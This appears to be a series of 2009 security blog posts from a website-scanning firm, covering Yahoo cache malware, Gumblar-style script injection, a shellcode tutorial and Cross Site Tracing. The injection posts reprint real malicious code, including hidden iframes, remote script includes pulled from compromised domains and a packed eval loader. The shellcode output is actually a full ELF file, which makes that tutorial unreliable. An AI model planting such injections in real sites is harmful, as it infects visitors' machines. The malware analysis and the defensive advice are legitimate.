Yahoo’s cached pages can be distributing malware.

Yahoo, has allowed users, for several years, to use the “cached pages” options displayed along with its search results on Yahoo-Search. Yahoo has partnered with McAfee’s SearchScan to provide safer searches since about May 2008. This is all good. The intention of providing safer searches to visitors is very noble. Google too, has led the pack in this direction by opening up its SafeBrowsing API and by providing visual warnings in search results boldly claiming “Warning visiting this website may harm your computer”.

Stopthehacker.com  has tried to communicate with executives at Yahoo since April 2009 about the potential problems that we have been observing in their cached pages. This has not been met with any real response.

The problem is simple, but very important. Cached versions of web pages displayed on Yahoo Search often contain malware code embedded in them. This is a phenomenon that we have observed repeatedly.

Consider one of our many attempts at communicating this issue to Yahoo (message shortened for brevity).

We have found that Yahoo’s cache results, even with SearchScan on, do not detect the presence of malware on its cached copies of webpages. I have attached some screen shots which prove the point.

Our scanners flagged the code in the cached copies right away. The site in question, for which I looked up Yahoo’s cache is http://www.xxxxxxxx.com

More info on our response to this site is available at http://xxxxxxxxxx.xxx/**stripped**

The screen shots attached with this post show an example of a website which was scraped by Yahoo’s spider, indexed and cached and then when accessed via its search results, pops up the malware code. There does not seem to be any kind of sanitization/scrubbing process going on in the background.

Worryingly, this problem gives rise to a very effective attack vector, where a malicious individual can compromise a site or even simply create a site that contains malicious code. Once the site is crawled by Yahoo’s spider, and is loaded in the cache, the link to this cached page becomes an excellent attack vector to use for social engineering, as it carries the sense of security that comes with Yahoo’s brand name. No need to exploit XSS/CSRF, no back-breaking hours of toil and sweat need to be put in discovering flaws in a site. Just get the infected pages cached in Yahoo! and voila, you have a live exploit launched from official Yahoo property.

Consider the fact that Yahoo search has 18% of the search market in October 2009, the number of visitors to the site is non-trivial! Moreover, Yahoo’s brand image can suffer, if this phenomenon becomes more wide spread or well-known.

Given my failed efforts to discuss this with Yahoo, at this point, I can only hope that this does not become more popular.

I cannot understand how Yahoo is employing SearchScan technology to provide safer search results to visitors, yet fails at the back-end to identify cached pages loaded with malware.

Till next time.

News, Security cache, injection, malware, yahoo

Solid financial institutions are the cornerstone of any successful economy. These institutions need to maintain the highest levels of security to protect sensitive customer data from becoming prey to malicious interests. Given the fact that these giants of industry have emergency response and security teams and that they spend hundreds of thousands of dollars a year on everything from general IT infrastructure to buying a plethora of security products. It is surprising to see that these top banks and financial institutions are not as locked down and airtight as one should expect.

We at StopTheHacker.com have conducted a study to ascertain if these top financial institutions are really secure or not. The findings, including a graphical summary, are also available in a PDF report attached at the end of this article.

Security Level of Top US Financial Institutions in 2009

The results were astonishing: 13 out of 14 websites had at least one critical vulnerability. In more detail, we highlight some key results below:

1. On average, there are 1.5 critical security issues in each financial institution
2. On average, there are 1.2 important security issues in each financial institution
3. On average, there are 7.9 general security issues in each financial institution
4. The highest company valuation in total assets does not correlate to the highest security
5. The financial institution in our set with the least valuation had zero critical security holes

The identified vulnerabilities are very serious: critical security issues/holes are widely seen as major security concerns by security experts, and security standards.

The most prevalent vulnerability among all of those discovered, allows a hacker to spawn what is known as a shell, more commonly known as the command-prompt, and thereby remotely executing harmful commands on the web server. Other vulnerabilities range from major Cross Site Scripting (XSS) vulnerabilities, which can enable hacker to steal credentials of website visitors, to a plethora of concerns with various software installations used on these systems.

For more information, please feel free to contact us.

• Download the Whitepaper

News, Report, Security 2009, banks, Security, security hole, US, vulnerabilities, XSS

It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue which we faced today was when trying to help out on badwarebusters.org today. It seems that one of our scans popped up a script hosted by Site Meter as potentially malicious. This gets interesting because this kind of code acts as a tracker to measure how many hits a site gets, where the users are coming from, how much time they spend on a page etc. The important point being this code is deployed on tons of websites. Some of the interesting websites I visit also have this code. I was intrigued to see why this popularly used counter was popping up as suspicious.

We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iFrame pointing to dg.specificclick.net using a body-onload event to trigger the event. Interestingly, dg.spe cificclick.net, has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]

It is surprising to see companies that have widely established customer bases to link to questionable content.

The code from the Site Meter script is presented below, the offending part is clearly visible.

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
 init:function( sCodeName, sServerName, sSecurityCode )
 ** code removed for brevity **
 onPageLoad:function()
 { 

 var newIFrame = document.createElement("iframe");
 newIFrame.frameBorder = 0;
 newIFrame.width = 0;
 newIFrame.height = 0;
 newIFrame.src = "http://dg.specif icclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL()); 

** code removed for brevity **

SiteMeter.init('s29rottweilers', 's29.sitemeter.com', ''); 

var g_sLastCodeName = 's29rottweilers';
// ]]>

The SafeBrowsing report from Google about this site follows:

• Google SafeBrowsing report – www.schwarzerwaldrottweilers.com

Read more…

News, Report, Security iframe, injection, malware, sitemeter, suspicious code

Try our Blacklist Monitoring service for free. Blacklisting can happen to anyone. Now, with Blacklist Monitoring, know before it’s too late to keep your customers. Getting quick notice can let you fix the problem faster. Together, we can help make the web a safer, better place to surf.

What’s in it for you?

• We tell you if your site appears on a blacklist, i.e. Google’s SafeBrowsing list.
• You’ll receive an email every day with your status.

Sign up now. It’s Free!

• Free Google Blacklist Monitoring

Blacklisting happens to sites everyday and some don’t even know it until they hear that their readers and customers can’t reach them (see badwarebusters). Being blacklisted can practically take your website off the Internet! Most web browsers, like Firefox, Internet Explorer, Safari, or Chrome, will keep your visitors from accessing your site entirely, some won’t even give your visitor a choice.

We hope this never happens to you, but we can prepare you for when it does. We’ll notify you immediately. We can even help you recover.

We’ll be adding more services soon, so check back and don’t forget to subscribe to our feed, or follow us on Twitter or Facebook!

Company, News blacklist monitoring, blacklisting, free service, google, notification, tracking

You might remember the article I wrote a couple of weeks back regarding the then recently found vulnerabilities of SSL 3.0 (TLS 1.0). Well, things just got real.

• New Security Issues come to light with SSL 3.0

At the time, some researchers even went so far as to say that the vulnerability was only theoretical! Too theoretical to even worry about. The attack is described in detail:

• TLS renegotiation vulnerability (CVE-2009-3555)

It appears that the popular micro-blogging site Twitter first fell victim to the attack. The Register has the full story:

• Researcher busts into Twitter via SSL reneg hole

Now that the attack is in the wild, where are the patches?
Read more…

News, Security CSRF, https, malicious websites, man in the middle, MITM, SSL, TLS

This weekend the only hot discussion topic except what awesome black Friday deals can people lay their hands on is the announcement concerning the fabled Google chrome OS. Early press articles have provided a good overview of what the Google OS might look like. The following articles are informative and entertaining.

• www.pcmag.com
• blogs.computerworld.com

One of the most important issues concerning this new shiny OS is security. Some pundits round the Internet seem to towing the line that this new thin client based OS is the panacea of most security issues plaguing us today. I only have one thing to say to them: wake up and smell the roses/coffee/eau-de-cologne…

Why do I say this: Google’s code is an “infant” compared to say the code branches for FreeBSD as an example. Google does have awesome engineers working on this project, they are very, very good. Moreover canonical the company which provides commercial support for Ubuntu, has done quite a bit of legwork behind the scenes. however, the point remains that the code used for this OS is very new, there will be issues with it. I can bet that zero-day attacks will evolve. The rationale is simple, writing an OS, even as simple as something like MINIX, which most universities introduce CS students to, is not easy to grasp. Think about the complexity associated with developing large numbers of clean software modules, linking them together and then performing white-box/black-box testing. This is hard enough for a non-Internet reliant application but for an OS which is heavily dependent on the net, the complexity is much much more. Heck, even the best web-applications have not figured out a bullet proof way to operate on the net. Furthermore, anyone who has written any kind of a web-app knows that users will always end up using the app in a way that has not been anticipated by the developers.

I must add though, the thought process behind the development of this architecture is impressive.

Consider the fact that even though the chrome OS is a thin client, it will still have to allow interfacing with external hardware such as your USB disk, which is another attack vector. It could be worth investigating if the OS could be “fooled” into opening up access to a virtual “non-existent” device which just pumps in code into the OS. Oh and yes, the chrome does have the ability to revert back to a “clean” version, but it becomes moot in the face of the biggest threat to the chrome OS: Social engineering.

The challenges of warding off an attack based on social engineering are no more a problem for chrome than any other OS/web-app/enterprise… Assuming the scenario mentioned, if we can open up a connection to the OS, making it believe that its opening up access to a USB disk, a binary is pumped in, which claims some famous AV company has provided you a free trial courtesy of Google… what then… the customer can be compromised and his “account” be used for bot purposes. Of course, once the damage is done you can remove the binary and break the link to the bot network.

The point being, security is an ongoing process. And the weakest link is an uninformed user, until that changes, whether it be Google chrome OS or Microsoft/Ubuntu/fedora/Unix… everything has a security hole: the human factor.

Till next time.

News, Security chrome, google, os

Writing shell code is perceived as a black art by many. The good news is that it is far from that. Anyone with a basic knowledge of programming and a desire to catch up on some basic assembly programming and CPU architecture can churn out shell code in less than an hour.

Lots of people have asked me for clarifications and tips for writing shell code. To this purpose, I will try to  introduce how to quickly write your first shell code program. Believe me you will feel awesome. I remember I did!

Lets try to look at a basic loop in assembly:

start:
xor ecx,ecx
mov ecx,5
loop start

XORing the ecx register with itself is a standard way to set it as zero. Every time the loop progresses through the code, the value in the ecx register is decremented by 1, until it is zero.

Lets write a small hello world program:

#include <stdio.h>

int main(){
write(1,"hello world: \n",15);
exit(0);
}

Now lets turn this into assembly:

gcc -O2 -S -c foo.c

Now we have:

section .text                         

global _start

_start:

mov     edx,len ;
mov     ecx,msg ;
mov     ebx,1   ;
mov     eax,4   ;
int     0x80    ;

;and exit

mov     ebx,0   ;
mov     eax,1   ;
int     0x80    ;

section .data

msg     db      "Hello, world!",0xa
len     equ     $ - msg

Following this, we use:

nasm -f elf test.asm
ld -s -o hello test.o

Voila! You have an executable! Moreover if you type in ls -all, you will notice the size of the assembly is only 1/9th of the size of the plain text code. Now lets use the tool available at www.safemode.org and type in:

s-proc -p test.o

To get… awesome shiny shell code.

char shellcode[] =
	"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x01\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x34\x00\x00\x00\x00"
	"\x00\x28\x00\x08\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
	"\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
	"\x80\x01\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00"
	"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xb0\x01\x00\x00\x0e"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
	"\x00\x00\x00\x00\x0d\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\xc0\x01\x00\x00\x1f\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x16"
	"\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xe0\x01\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x02\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x02\x00\x00\x70"
	"\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00"
	"\x10\x00\x00\x00\x28\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x90\x02\x00\x00\x1a\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x30"
	"\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xb0\x02\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
	"\x00\x04\x00\x00\x00\x08\x00\x00\x00\xba\x0e\x00\x00\x00\xb9"
	"\x00\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd"
	"\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x65\x6c"
	"\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a\x00\x00\x00\x54"
	"\x68\x65\x20\x4e\x65\x74\x77\x69\x64\x65\x20\x41\x73\x73\x65"
	"\x6d\x62\x6c\x65\x72\x20\x32\x2e\x30\x33\x2e\x30\x31\x00\x00"
	"\x00\x2e\x74\x65\x78\x74\x00\x2e\x64\x61\x74\x61\x00\x2e\x63"
	"\x6f\x6d\x6d\x65\x6e\x74\x00\x2e\x73\x68\x73\x74\x72\x74\x61"
	"\x62\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72\x74"
	"\x61\x62\x00\x2e\x72\x65\x6c\x2e\x74\x65\x78\x74\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x04\x00\xf1\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x03\x00\x02\x00\x12\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x16\x00\x00\x00\x0e\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\xf1\xff\x0b\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x10\x00\x01\x00\x00\x74\x65\x73"
	"\x74\x2e\x61\x73\x6d\x31\x00\x5f\x73\x74\x61\x72\x74\x00\x6d"
	"\x73\x67\x00\x6c\x65\x6e\x00\x00\x00\x00\x00\x00\x00\x06\x00"
	"\x00\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

Till next time, adios!

Security assembly, code, coding, shell code

In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites and computers which load them up in browsers for the viewing them. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web-enthusiasts have wizened up to the fact that code-injection is a never ending battle and they are making efforts to identify and remove malicious code from their sites.

This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html.  You will find the following code listed on one of the associated mootools JavaScript files which are pulled in from the local drives. The malicious code causes an infection which leads to a site being blacklisted by Google. The detailed report from Google would probably mention that the infection of the Gumblar” type.

Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&amp;&amp;obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
return type;};function $merge(){var mix={};for(var i=0;i&lt;arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&amp;&amp;$type(ap)=='object'&amp;&amp;$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i&lt;l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&amp;&amp;!document.all&amp;&amp;!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement(&quot;iframe&quot;);HTMLElement.prototype=(window.webkit)?window[&quot;[[DOMElement.prototype]]&quot;]:{};}
HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand(&quot;BackgroundImageCache&quot;,false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&amp;&amp;this.initialize&amp;&amp;$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i&lt;l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&amp;&amp;previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&amp;&amp;this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
return this;},fireEvent:function(type,args,delay){if(this.$events&amp;&amp;this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}

**code removed for brevity**

this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i&lt;l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&amp;&amp;(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&amp;&amp;!test){toggler.inject(this.container);element.inject(this.container);}
var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&amp;&amp;this.options.wait)||(index===this.previous&amp;&amp;!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&amp;&amp;(el.offsetHeight&gt;0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

**malicious code**

document.write('&lt;scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php &gt;&lt;\/sc ript&gt;');
document.write('&lt;scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php &gt;&lt;\/s cript&gt;');&lt;/pre&gt;
etTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;

Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

// MediaWiki JavaScript support functionsvar clientPC = navigator.userAgent.toLowerCase(); // Get client info
<pre id="cb0049f11cbf55990b47f8e86dc03a62ee0ea17d-133-highlight">
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');</pre>

Security gumblar, hack, injection, mootools, script

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

This particular example is not a popularly deployed script, and is probably hand-coded by a developer for their purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed on one of the associated JavaScript files which are pulled in from the local drives. Interestingly, the code is packed using the popular, Dean-Edwards-Packer, like format. Unpacking it is trivial and hence the actual code which was not part of the original file is also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(be(c)b,g),k[c])}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']</pre>

Our systems flagged this as unsafe and for further validation one can look up malware-domain-list .

The exploit seems to throw a executable to the victim’s system, which in turn is a down-loader and tries to grab two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');

Security hack, injection, script

Cross Site Tracing (XST) are one of the most prevalent threats in the Internet today. The surprising fact is that even though developers are somewhat familiar with other attack vectors, XSS (Cross site scripting), SQLi (SQL injection) and others, relatively few seem to know what XST is.

XST uses the HTTP TRACE functionality which is basically the output containing the request and response headers and any associated HTML. A web server which supports this functionality and has it enabled, will reply back with the header data and the HTML. TRACE was designed for debugging HTTP servers. When the server receives a TRACE request, it is supposed to respond by echoing back all the content of the request, which includes the cookie information.

It is common knowledge that cookies are transported over the Internet via HTTP headers and hence if you can view the headers you can have a chance at gleaning off information from the cookie and gaining access to a session which relies on cookies to keep track of a user. An attacker gets a naive user’s browser to run a script that sends a TRACE request to the target server. When the request is reflected back to the browser, the script can pull out any cookies and sent them to the attacker. This type of attack is generally used when ordinary cross-site scripting won’t work because the site uses the “HTTP Only” flag on its cookies.

For Apache versions > 1.3.34 for the legacy series, and 2.0.55 (or newer) for apache2 this can be done very easily because there is a new Apache variable that controls if TRACE method is enabled or not:

TraceEnable off

This needs to be added in the main server config and the default is enabled (on). TraceEnable off causes Apache to return a 403 FORBIDDEN error to the client.

Here’s some testing code which can help you find out if sending the web server a TRACE HTTP request provides with the header and the entire conversation.

<script type="text/javascript">
<!--
function TraceSend(){
  request=false;
  if(window.XMLHttpRequest){
    try{
      request=new XMLHttpRequest();
    }catch (e) {
      request=false;
    }
  }else if (window.ActiveXObject){
    try{
      request=new ActiveXObject("Msxml2.XMLHTTP");
    }catch(e){
      try{
        request=new ActiveXObject("Microsoft.XMLHTTP");
      }catch(e){
        request=false;
      }
    }
  }
  if(request) {
    request.open("TRACE", "http://website", false)
    request.send();
    buf=request.responseText;
    alert(buf);
  }
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="TraceSend();" VALUE="Check TRACE">

Security cross site tracing, flaw, XST